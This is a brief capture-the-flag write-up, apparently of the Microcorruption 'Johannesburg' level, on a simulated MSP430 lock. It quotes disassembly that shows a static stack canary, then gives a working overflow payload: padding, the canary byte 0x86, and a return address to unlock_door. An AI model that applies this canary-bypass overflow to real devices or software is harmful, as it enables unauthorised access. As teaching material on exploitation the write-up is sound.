# 8. Johannesburg

# Challenge Overview

OVERVIEW

    - A firmware update rejects passwords which are too long.
    - This lock is attached the the LockIT Pro HSM-1.

# Solution

Looking at the assembly it seems there is a static canary after the input buffer:

4566:  b012 4644      call	#0x4446 <unlock_door>
---
4578:  f190 8600 1100 cmp.b	#0x86, 0x11(sp)
457e:  0624           jz	$+0xe <login+0x60>
4580:  3f40 ff44      mov	#0x44ff "Invalid Password Length: password too long.",
---
458c:  3150 1200      add	#0x12, sp

To get around this we can just add it to the buffer:

| padding | canary | srp |

So: 0x41*17+0x86 + 0x4644

trying this:

4141414141414141414141414141414141864644

The works!

Nice intro to canaries.